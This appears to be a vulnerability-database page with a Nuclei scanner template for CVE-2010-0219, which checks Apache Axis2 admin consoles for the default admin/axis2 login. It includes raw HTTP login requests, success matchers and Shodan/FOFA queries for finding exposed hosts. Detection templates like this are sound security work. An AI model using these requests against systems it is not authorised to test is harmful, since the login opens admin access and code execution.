Apache Axis2 Default Login

2021-02-2620:03:32

ProjectDiscovery

github.com

165

cve

axis2

apache

default login

vulnerability

remote code execution

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

7.9

Confidence

High

EPSS

0.975

Percentile

100.0%

JSON

Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.

id: CVE-2010-0219

info:
  name: Apache Axis2 Default Login
  author: pikpikcu
  severity: critical
  description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data.
  remediation: |
    Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0219
    - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
    - http://www.rapid7.com/security-center/advisories/R7-0037.jsp
    - http://www.vupen.com/english/advisories/2010/2673
    - http://retrogod.altervista.org/9sg_ca_d2d.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2010-0219
    cwe-id: CWE-255
    epss-score: 0.97509
    epss-percentile: 0.99984
    cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: axis2
    shodan-query:
      - http.html:"Apache Axis"
      - http.html:"apache axis"
    fofa-query: body="apache axis"
  tags: cve,cve2010,axis,apache,default-login,axis2

http:
  - raw:
      - |
        POST /axis2-admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginUsername={{username}}&loginPassword={{password}}
      - |
        POST /axis2/axis2-admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userName={{username}}&password={{password}}&submit=+Login+

    payloads:
      username:
        - admin
      password:
        - axis2
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<h1>Welcome to Axis2 Web Admin Module !!</h1>"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b202ff112ac09598ca6e373881d17b8a249a5398bf3a267b590ef948c91b8df2022015efa111b4715764807e6ae1c1516711d3d38d0a73835b1bbda2b1b7cf910854:922c64590222798bb761d5b6d8e72950